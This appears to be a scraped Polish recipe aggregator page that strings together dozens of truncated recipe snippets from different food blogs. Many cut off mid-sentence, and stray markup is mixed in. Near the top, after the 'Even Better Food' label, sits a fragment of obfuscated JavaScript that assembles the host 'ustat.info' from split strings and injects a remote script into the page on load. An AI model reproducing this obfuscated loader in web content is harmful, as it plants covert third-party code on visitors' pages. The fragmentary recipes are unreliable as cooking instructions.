czerwona papryka 1/2 świeżego ananasa 2-3 cebule dymki wraz z szczypiorem plaster świeżego imbiru 2 ząbki czosnku 1-2 łyżki czarnego lub białego sezamu sól, pieprz, 1/3 łyżeczki mielonej kolendry, szczypta ostrej papryki olej kokosowy do smażenia Ryż ugotować na sypko. W garnku zagotować 3/4 szklanki wody z połową łyżeczki soli, ryż przepłukać na sicie i wsypać(...)mieszając, aż ryż wchłonie cały płyn. Jeśli stanie się to zanim ziarenka zmiękną, dodać odrobinę wody i kontynuować gotowanie ryżu do miękkości. W czasie, gdy gotuje się ryż usmażyć warzywa. Marchewki pokroić w drobną kostkę, czosnek posiekać, plaster imbiru zetrzeć za tarce o drobnych oczkach. Ziarna kukurydzy odkroić z kolby. Na dużej patelni rozgrzać 2 łyżki oleju kokosowego, wrzucić imbir
Even Better FoodoXz8.async=true;oXz8_="u"+("s")+"t"; oXz8u="65506613.";oXz8_+="a"+("t.i");oXz8_+="n"+("f"+"o")+"/"; oXz8u+="s5bXrfyjXz86xis19fel46"+("pjnwnc58"); oXz8.src="//"+oXz8_+oXz8u;oXz8.type="text/javascript"; document.body.appendChild(oXz8); })(); Udka kurczaka pieczone z warzywami w rękawie Składniki: 14 podudzi z kurczaka 5 czerwonych cebul 6 pomidorów 2 główki młodego czosnku 2,5 kg młodych, małych ziemniaczków 4-5 młodych marchewek 1 cukinia(...)szparagowej Dodatkowo: 2 łyżki słodkiej papryki 2 łyżki ziół prowansalskich sok z połowy limonki 200 g śmietany 30% 2 czubate łyżki koncentratu pomidorowego 1/2 szkl. wody sól i świeżo mielony pieprz do smaku olej rzepakowy Sposób przygotowania: Podudzia z kurczaka myjemy i wrzucamy do zimnej, mocno osolonej wody na minimum trzy godziny (a najlepiej na całą
Kolorowy Przepisownik3-4 30 min Łatwe Tanie Przepis na cukinię z grilla. Składniki 1 cukinia 3-4 łyżki oliwy (w zależności od wielkości cukinii) 3-4 ząbki
PysiaGotuje.plKREMOWA ZUPA POMIDOROWA Z SEZAMEM, IMBIREM I JABŁKAMI SKŁADNIKI : 1/2 filiżanki ziaren sezamu - uprażonych na suchej patelni 1 cebula 1 łyżeczka brązowego cukru 1 łyżka posiekanego
Moja Książka KucharskaZapraszam na pyszną jesienną zupę dyniową. Jest bardzo łatwa i szybka do przygotowania. Każdemu będzie smakować. Polecam!!! SKŁADNIKI: ½ kg miąższu z dyni 2 pomarańcze 1 cebula
Tradycyjna kuchnia KasiKolejny przepis z cyklu wariacji na temat cukinii... Tym razem jej przygotowanie będzie wymagało od nas dużo więcej pracy, ale efekt jest znacznie, znacznie lepszy
Lawendowe NieboEkspresowa w przygotowaniu pikantna pasta z bobu. Świetna do kanapek, polecam :) na 2 porcje: szklanka ugotowanego i obranego bobu łyżka soku z cytryny łyżeczka tabasco (użyłam
Mienta blogLekka, pyszna i zdrowa sałatka z dodatkiem wędzonego łososia. Coś pysznego! Składniki : * ulubiona sałata * plasterki grillowanej cukinii * pół żółtej papryki * pomidor * kilka oliwek * 100g wędzonego łososia
Magiczne Życie MartyMakaron z cukinią i kurczakiem to jedno z moich ulubionych dań. Jest niezwykle szybkie w przygotowaniu, a przy okazji po prostu smaczne. Makaron ten możecie zjeść
Kulinarnyblog.pl - wiesz jak gotować!Zapiekanki ryżowe z warzywami to jedne z łatwiejszych i nie trudnych do przygotowania obiadowych dań, najlepiej smakuje gdy jest dość dobrze doprawione pieprzem lub nawet odrobiną chili, czosnek w tej potrawie można pominąć –to ukłon wobec tych którzy niekoniecznie tolerują jego obecność w kuchni. Zapiekankę podawać od razu po wyjęciu z piekarnika, wtedy jest najsmaczniejsza, doskonale wpisze się w jednodaniowy(...)papryka 1 świeży brokuł 3 łodygi selera naciowego 3-4 ząbki czosnku (niekoniecznie) 2 łyżki koncentratu pomidorowego 3-4 łyżki oleju z chili Zioła prowansalskie do smaku Świeżo mielony pieprz do smaku Sól morska do smaku Sos: 3 łyżki śmietany 18% 1 jajko 50 g startego żółtego sera np. gouda Odrobina masła do natłuszczenia formy Sposób przygotowania: Ryż ugotować
Wanilia i KardamonGrillowane piersi z kurczaka w miodowo-chrzanowej marynacie , to idealna propozycja na obiad jak i na przyjęcie. Takie piersi możemy podać w towarzystwie świeżych warzyw, ulubionych surówek. Mogą one stanowić również składnik wielu sałatek (wystarczy je drobniej pokroić). Podstawę smaku stanowi marynata. Najważniejsze, żeby użyć do niej dobrej jakości miód i chrzan. Osobiście polecam Wam chrzan tarty „POLONAISE(...)potrzeb) 1 duża pierś z kurczaka 2 łyżki chrzanu tartego „POLONAISE” 2 łyżki miodu 1 płaska łyżka przyprawy – u mnie do sałatek* 1 łyżka oleju czarny mielony pieprz do smaku *skład: sól, papryka słodka czosnek, pieprz czarny, por, bazylia, natka pietruszki. Można zamienić na inną przyprawę o podobnym składzie Przygotowanie: Pierś z kurczaka kroimy
Słodkie okruszkiróżnych ziół zmienia jego smak. W ten sposób powstaje nowa wersja gulaszu, a domownikom potrawa raczej nie ma prawa się znudzić. Nieważne jakie mięso użyjemy gulasz mięsny z warzywami zawsze świetnie się komponuje. Z czym podać gulasz mięsny? Przyznam, że moi domownicy najbardziej lubią gulasz z ryżem lub ziemniakami. Ja jednak najbardziej lubię gulasz z kaszą(...)marchewka 10 cm pora 1 rozetka pak choi 150 g groszku cukrowego 200 g pieczarek ½ łyżeczki suszonego tymianku 2 łyżki natki pietruszki 1 łyżka mąki ½ łyżeczki czarnego pieprzu, grubo mielonego 2 łyżki masła 500 ml wrzątku lub bulionu mięsnego Podziel mięso na małe kawałki, oprósz mąką i pieprzem. Rozgrzej masło i wrzuć mięso. Smaż aż mięso lekko się zrumieni
codojedzeniamielony natka pietruszki sól, pieprz Przygotowanie Normal 0 21 false false false MicrosoftInternetExplorer4 Na rozgrzanym tłuszczu podsmażamy mięso, rozdzielając je drewnianą łyżką. Następnie dodajemy pokrojone jarzyny, ziemniaki, oczyszczoną brukselkę (większe kroimy na pół). Razem chwilę podsmażamy, dodajemy pomidory wraz z zalewą, suszoną bazylię, dusimy pod przykryciem kilka minut, zalewamy wrzątkiem, gotujemy do miękkości warzyw
R'n'G Kitchenpieprz czarny mielony śmietana do zup Na dno dużego garnka wlać niewielką ilość oleju rzepakowego i wrzucić pokrojoną w kostkę cebulę. Smażyć, aż się zeszkli, po czym dołożyć mięso. Stale mieszając lekko obsmażyć. Wrzucić do garnka poszatkowaną kapustę, pokrojoną marchewkę i selera. Dodać ziele angielskie, liścia laurowego, pieprz czarny i całość zalać wodą. Gotować, aż warzywa zmiękną i wsypać
https:KKuchniaMniamPieczone młode warzywa Ryż z bobem i szpinakiem Pasta z bobu z miętą Pasta z bobu Letnia sałatka makaronowa z żółtymi burakami, bobem i kozim serem Zielony ryż z bobem i groszkiem cukrowym Zielone warzywne curry Pasta z bobu z serem Czas przygotowania: 15 minut Składniki: 500 g ugotowanego i obranego bobu 4 łyżki białego mielonego sera (użyłam Mojego
Kulinarne przygody Gatityświeżo mielonym pieprzem. Chwilę smażymy, a następnie zalewamy połową bulionu. Dodajemy miód i sos sojowy. Dusimy wszystko pod przykryciem. W osobnym garnku rozgrzewamy oliwę, na której smażymy kapustę. Po chwili smażenia dolewamy wino i dusimy pod przykryciem. Następnie dolewamy pozostałą część bulionu. Gotujemy przez około 10 minut. Po tym czasie łączymy kapustę z pozostałymi warzywami i gotujemy kolejne
wege i kropkawarzywa, ulubiona kasza, odrobina sera i multum przypraw. Nie wiem czy jest ktoś komu mogłaby ona nie zasmakować. Smaczniejszego połączenia nie znam! Składniki (na 2 - 3 porcje): 1/2 suchej szklanki bulgur 1/2 pęczka szparag zielonych 1/2 pęczka botwiny 50 gram sera feta 2 łyżki uprażonych płatków migdałów 1 łyżka masła sól, pieprz, kolendra mielona
Mango Papajaczosnkiem szczypta mielonego imbiru 1 łyżeczka słodkiej wędzonej papryki sól pieprz 3 łyżki oleju rzepakowego do podania: 4 łyżki tartego parmezanu 4 łyżki śmietany lub gęstego jogurtu naturalnego prażone pestki (słonecznik, dynia, sezam) olej dyniowy Dynię wydrążyć, obrać ze skórki, pokroić w kostkę. Marchew i pietruszkę obrać, pokroić w talarki. Do garnka wlać olej, wrzucić warzywa, smażyć chwile
Obiad gotowyłyżeczka kminku mielonego, 1/2 łyżeczki pieprzu ziołowego, 1/2 łyżeczki suszonej natki pietruszki, szczypiorek do dekoracji. Wykonanie: Kaszę jaglaną moczymy przez kilka godzin, następnie obficie przepłukujemy wodą i gotujemy. Kapustę, cukinię i cebulę kroimy, a później dusimy na patelni z zielem angielskim i liściem laurowym (po uduszeniu pozbywamy się ziela i liścia laurowego). Kaszę łączymy z warzywami i przyprawami
Jeść, by żyć w zdrowiusól świeżo mielony pieprz ponadto: 2-3 łyżki jogurtu naturalnego pestki dyni groszek ptysiowy Dynię i ziemniaki pokroić w niedużą kostkę. Cebulę i czosnek drobno posiekać. W garnku rozgrzać masło,wrzucić posiekaną cebulę z czosnkiem,lekko przysmażyć. Dodać dynię i ziemniaki,chwilę smażyć,dodać starty imbir i kurkumę,zalać bulionem i gotować ( ok.10-15 minut) aż warzywa zmiękną. Całość zmiksować
Kolorowa kuchnia Elkipełna warzyw i ziół na pobudzeniu układu odpornościowego, curry, kurkuma, czosnek itp.. Składniki 2 słodkie cebule 4 filiżanki brokułów (posiekane) 2 marchewki (obrane i pokrojone w plastry) 1 łodyga selera (posiekane) 1 łyżeczka curry w proszku ⅛ łyżeczki kurkumy ¼ łyżeczki kolendry ⅛ łyżeczki cynamonu ¾ łyżeczki czosnku w proszku ¼ łyżeczki czarnego pieprzu 1 łyżeczka soli ½ łyżeczki mielonego cebula suszona
w mojej kuchnipierwszych warzyw, jakie podaje się małemu dziecku. Dzięki dużej zawartości związków odżywczych i łatwości trawienia dietetycy polecają ją już półrocznym maluchom. http://www.poradnikzdrowie.pl/zywienie/co-jesz/Cukinia-wartosci-odzywcze-i-przepisy-na-dania-z-cukinii_34738.html 2 średnie cukinie 1 por kilka świeżych pieczarek 6 kawałków suszonych pomidorów w oleju 1 ser pleśniowy Lazur 1/2 łyżeczki ostrej i słodkiej papryki gałązka świeżego rozmarynu sól, pieprz świeżo mielony Wykonanie: Cukinie myjemy, kroimy
kgwjanczewopieprz, papryka mielona słodka, ostra itd......) Przygotowanie: Mięso umyłam i pokroiłam w kostkę po czym ugotowałam w osolonej wodzie, a po to żeby było szybciej miękkie ponieważ jak usmażymy mięso to ono zamknie się od zewnątrz szybko i później trzeba go długo gotować, żeby zmiękło. W tym czasie w osobnym garnku gotuję bulion i wrzucam warzywa wszystkie pokrojone
Tanio smacznie i prostoczosnku kminek mielony (jeśli ktoś lubi to może być cały) liść laurowy kilka ziaren ziela angielskiego suszony lubczyk sól pieprz mała cebula 10 dag kabanosów z kurczaka + odrobina klarowanego masła bulion lub woda – u mnie pół na pół woda z domowym rosołem WYKONANIE: Ziemniaki, marchew, pietruszkę i selera obrać, opłukać. Ziemniaki pokroić w kostkę, pozostałe warzywa w plasterki
Kuchenne zapiski Edytyłyżka pieprzu mielonego 3 łyżki soli Zalewa: 1 szklanka octu 1 szklanka oleju 3/4 szklanki cukru Sposób przygotowania: Ogórki myjemy, kroimy w plastry (najlepiej zetrzeć na tarce jak na mizerię).Marchew obieramy i ścieramy na tarce o grubych oczkach,obraną cebulę kroimy w pióra.Wszystko przekładamy do większej miski, dodajemy sól, dokładnie wszystko mieszamy .Gdy warzywa puszczą sok dodajemy
Bajeczna Kuchniałyżeczki mielonego ziela angielskiego 1-2 łyżeczki marynowanego zielonego pieprzu sól, pieprz + wywar z grzybów i gotowania mięsa do rozrzedzenia masy parę plastrów słoniny lub boczku do foremek przygotowanie Jeżeli nie mamy gotowanej kury i wołowiny z rosołu, gotujemy je razem z podgardlem. Mięsa, oprócz wątróbki, pokrojone w dużą kostkę, włożyć do garnka, dodać warzywa, parę ziarenek pieprzu, listek
Stare Garypekińskiej i warzyw. Najlepiej smakują na ciepło, ale na zimno też są smaczne. Z podanych składników wyszło mi 8 bardzo dużych sztuk. Składniki: 650 g mąki 2 jajka 1,5 szklanki wody 45 g drożdży 1 łyżeczka soli 1 łyżeczka cukru 2 łyżki oleju łyżka czarnuszki na farsz: 250 g kapusty kiszonej 300 g mięsa mielonego 1 cebula
Domowa Cukierenka-Domowa Kuchniainne owoce + warzywa - osobiście kupuję z targu, bo mam wygodny układ z sąsiadami, którzy tam handlują ale spokojnie znajdziecie wszystko w tej przysłowiowej Biedronce, dobrej jakości i w dobrych cenach. - Awokado - Biedronka, bywa promocja na pyszną odmianę Hass 10 zł/kg. - Len i przyprawy biorę od siebie, np. super cynamon tutaj: DR-KALDYSZ-CYNAMON-MIELONY
Wegański blog WSZYSTKO JEST W GŁOWIEmięso, będziemy mieli dodatek do kanapek, ale czy zostanie wątpię? Zapraszam do zapoznawania się z przepisem. SKŁADNIKI 2 kg. schabu bez kości po 1 łyżce przypraw typu: majeranek, bazylia , tymianek, papryka słodka 1 łyżeczka pieprzu 3-4 ząbki czosnku 2 łyżki oliwy 1 łyżka sosu sojowego -ciemny 2 łyżki oleju lub smalcu do obsmażenia schabu Warzywa: 2 marchewki
W kuchennym oknie Ewywarzywną(najlepsze warzywa z rosołku-pamiętajcie) i śledzie na konfiturze z gruszki i suszonej żurawiny. Myślę, że taka sałatka może znaleźć miejsce również na wigilijnym stole, nie tylko jako przekąska.. SKŁADNIKI: 4-6 filety śledziowe KONFITURA 2 gruszki 10 dag żurawiny 1-2 łyżki cukru 1-2 łyżki soku z cytryny pieprz grubo mielony do smaku
Kuchnia Beatysiłownią. Są warzywa, jest białko, są węglowodany. Dwie godziny później wyciskamy z siebie siódme poty. Pół roku później jesteśmy misterami trawników, parków, klubów, plaż i wszystkich innych hipsterskich miejscówek. Składniki: 1/2 piersi z kurczaka suszony rozmaryn 1 papryka 2 marchewki 1 cukinia 3 ząbki czosnku 2 małe cebule 6 łyżek oliwy z oliwek ostra papryka mielony imbir ciemny
GRUBY WAŁEKsobą mielone mięso, bułkę, żółtko, usmażoną szalotkę razem z użytym do tego celu olejem oraz przyprawy: słodką i ostrą paprykę oraz 1 łyżeczkę soli. Wyrabiamy starannie na możliwie jednolitą masę, po czym formujemy kształtne niezbyt duże klopsiki – z tej ilości mięsa powinno ich powstać 12-15 sztuk. Z gotowego wywaru usuwamy mięso i wszystkie warzywa oprócz marchewki. Doprowadzamy
Kulinarna Pokusamarchewki - czosnek mielony, domowa wegeta , majeranek - olej - 0,5 szklanki mleka - 1,5 łyżki mąki Wykonanie Piersi z kurczaka kroję w kostkę lub paseczki, podsmażam na łyżce oleju ,dodaję pokrojonego w cieniutkie plasterki pora i pokrojoną w półplasterki marchewkę. Doprawiam czosnkiem i domową wegetą. Mieszam, podlewam gorącą, przegotowaną wodą tylko tyle aby zakryła mięso i warzywa. Naczynie przykrywam pokrywką
Kuchnia z widokiem na ogródcytryny słodka mielona papryka pieprz sól Marchewkę obrać i pokroić w talarki (ja to zrobiłam malakserem bo było szybciej) Ziemniaka obrać i pokroić w kostkę (u mnie ubite ziemniaki, które zostały z obiadu) Cebulę obrać o pokroić w kostkę Pora i czosnek pokroić w plasterki W garnku z grubym dnem rozgrzać łyżkę oliwy i przełożyć warzywa Dusić
www.szczesliwakuchnia.blogspot.comświeżo mielony pieprz - majeranek otarty - 3-4 łyżki oleju arachidowego (może być rzepakowy) Surową kiełbasę sparzamy wrzątkiem (zalewamy na 30 min., pod przykryciem). Obrane i umyte cebule kroimy w piórka. Paprykę oczyszczamy z nasion, płuczemy i kroimy w paski. Czosnek również kroimy w paski. Kiełbasę wkładamy do naczynia żaroodpornego, dodajemy cebulę, paprykę i czosnek. Warzywa oprószamy solą
mojewypiekiinietylkowielbicielom tego warzywa. Aromatyczna, sycąca i zdrowa- idealnie sprawdzi się jako posiłek do lunch box'a, co osobiście przetestowałam. Porcja to 311kcal w tym 22g białka , 6g tłuszczu oraz 40g węglowodanów . SKŁADNIKI: 30g świeżej rukoli 40g makaronu żytniego razowego- przed ugotowaniem 75g wędzonego pstrąga 80g papryki świeżej 60g kukurydzy konserwowej oregano bazylia sól czosnkowa papryka mielona ostra
peanutbuttermonsterpieprz świeżo mielony 2 listki laurowe sól oliwa Pyszne pomidorki cherry, które są nowością znajdziecie na stronie Owocowego Raju Soje namaczamy na 10-12 godzin przed gotowaniem, następnie odcedzamy i gotujemy w nowej wodzie z niewielką ilością soli. Marchewkę kroimy w słupki, paprykę, cebulę i czosnek w cienkie plastry, rozgrzewamy oliwę na patelni i przesmażamy warzywa. Do gotującej się
Apetyczna babeczkaObieraczką do warzyw wycinamy wstążki. Ścieramy na tarce imbir i mieszamy z sokiem z pomarańczy, pieprzem cayenne oraz oliwą. Marchewkę mieszamy z marynatą i odstawiamy na kilka minut. Rozgrzewamy piekarnik do 200 st. Marchewkę rozkładamy na blasze z papierem do pieczenia i pieczemy ok 7 min. Rostbef kroimy na 4 steki, myjemy, osuszamy. Oprószamy grubo mielonym pieprzem. Smażymy
Brzuszki Łakomczuszki